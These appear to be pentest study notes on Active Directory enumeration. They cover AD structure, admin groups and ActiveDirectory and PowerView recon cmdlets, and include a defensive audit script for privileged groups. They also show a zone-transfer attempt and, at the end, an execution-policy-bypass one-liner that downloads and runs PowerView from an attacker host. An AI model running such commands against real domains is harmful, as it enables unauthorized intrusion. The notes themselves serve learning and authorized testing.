# Active Directory Enumeration

* Consists of
    * Domain Controller 
    * Organizational Units
        * Users
        * Groups
    * Trusts
    * AD Domains
    * AD Forest
    * Policies

* Administrative accounts are
    * Domain Admin
    * Enterprise Admin
    * Schema Admin
    * Server Operator
    * Account Operator

## Domain Controller

* AD Domain Services data store
* Authentication and authorization
* Update replication / sync with other domain controllers in the forest
* Administration of domain resources

### AD DS Store

* Database of directory info such as users, groups and services
    * `ntds.dit` contains the information, including password hashes
    * Located in `%SystemRoot%\NTDS`

### Forest

* __Trees__, hierarchy of domains in the AD Domain Services
* __Domains__, groups of objects
* __Organizational Units (OU)__, containers of objects such as groups, users, printers and other resources
* __Trusts__, allows users to access resources in a different domain
* __Objects__, users, groups, printers, computers or shares
* __Domain Services__, DNS, LLMNR, SMB
* __Domain Schema__, rules for object creation

### Users

* __Domain Admin__, DC access
* __Server Accounts__, service maintenance, may have admin permissions
* __Local Admin__, administrative permission on an object but not the DC
* __Domain Users__, average user account on a local machine which may have admin permissions

### Policies

* Rule sets
* Apply to a domain
* Enables or disables services on a domain basis, like antivirus and malware scanning
    * __Disable Windows Defender__
    * Communication signing, e.g. SMB

### Domain Services 

* __LDAP__
* __Certificates__, handling for services, CRL
* __DNS, LLMNR, NBT-NS__

### Authentication

* __NTLM__, challenge/response via hashes
* __Kerberos__, ticket granting service

## Usage

* Cmdlets are run on the Domain Controller
* Get help with `Get-Help Get-Command -Examples` and list cmdlets with `Get-Command Get-*`

* From `ActiveDirectory` module
```powershell
Import-Module ActiveDirectory   # module name has no hyphen
Get-ADDomain | Select-Object NetBIOSName,DNSRoot,InfrastructureMaster   # current domain and its FSMO holder
Get-ADForest | Select-Object Domains                                    # all domains in the forest
Get-ADTrust -Filter * | Select-Object Direction,Source,Target           # trust relationships
```

* `systeminfo | findstr Domain`
* `Get-ADUser -filter *`
* Use the CN and DC values found above to narrow the search base
* `Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"`
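As an added example (not part of the original notes), the script below uses the same `ActiveDirectory` module to audit the administrative groups listed at the top of the page: it expands nested membership and flags members a reviewer would want to look at, such as disabled accounts, passwords that never expire, stale passwords, or admin accounts that also carry an SPN. It assumes the RSAT module is installed and the caller can read the domain; `$privilegedGroups` and the CSV path are my own choices.

```powershell
# Added example: audit membership of the built-in administrative groups.
# Assumes the RSAT ActiveDirectory module is installed and the caller can read the domain.
Import-Module ActiveDirectory

# Enterprise Admins and Schema Admins exist only in the forest root domain,
# so they are resolved against that domain rather than the current one.
$domain     = Get-ADDomain
$forestRoot = (Get-ADForest).RootDomain
$privilegedGroups = @(
    @{ Name = 'Domain Admins';     Server = $domain.DNSRoot },
    @{ Name = 'Enterprise Admins'; Server = $forestRoot },
    @{ Name = 'Schema Admins';     Server = $forestRoot },
    @{ Name = 'Server Operators';  Server = $domain.DNSRoot },
    @{ Name = 'Account Operators'; Server = $domain.DNSRoot }
)

$report = foreach ($g in $privilegedGroups) {
    # -Recursive expands nested groups so indirect members are not missed
    $members = Get-ADGroupMember -Identity $g.Name -Server $g.Server -Recursive |
        Where-Object objectClass -eq 'user'
    foreach ($m in $members) {
        $u = Get-ADUser -Identity $m.distinguishedName -Server $g.Server `
            -Properties Enabled, PasswordNeverExpires, PasswordLastSet, LastLogonDate, ServicePrincipalName
        $flags = @()
        if (-not $u.Enabled)         { $flags += 'disabled' }
        if ($u.PasswordNeverExpires) { $flags += 'pwd-never-expires' }
        if ($u.ServicePrincipalName) { $flags += 'has-SPN' }   # admin account doubling as a service account
        if ($u.PasswordLastSet -and $u.PasswordLastSet -lt (Get-Date).AddYears(-1)) {
            $flags += 'pwd-older-than-1y'
        }
        [pscustomobject]@{
            Group           = $g.Name
            SamAccountName  = $u.SamAccountName
            Enabled         = $u.Enabled
            PasswordLastSet = $u.PasswordLastSet
            LastLogonDate   = $u.LastLogonDate
            Findings        = ($flags -join ',')
        }
    }
}

$report | Sort-Object Group, SamAccountName | Format-Table -AutoSize
# Keep a copy so membership drift can be compared between reviews (path is my own choice)
$report | Export-Csv -Path .\privileged-group-audit.csv -NoTypeInformation
```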

### Powerview Module

* [Powerview](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
```powershell
Import-Module .\PowerView.ps1
Get-NetDomain             # current domain
Get-NetDomainController   # DCs for the domain
Get-NetForest             # forest information
Get-NetDomainTrust        # trust relationships
```

### DNS

* Check the local IP via `ipconfig`
* Start `nslookup`, run `server <LocalIP>`, then attempt a zone transfer via
```sh
ls -d <Domain>
```

### Tips & Tricks

* Download and execute in one line
```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerView.ps1'); Get-NetUser | select samaccountname, description"
```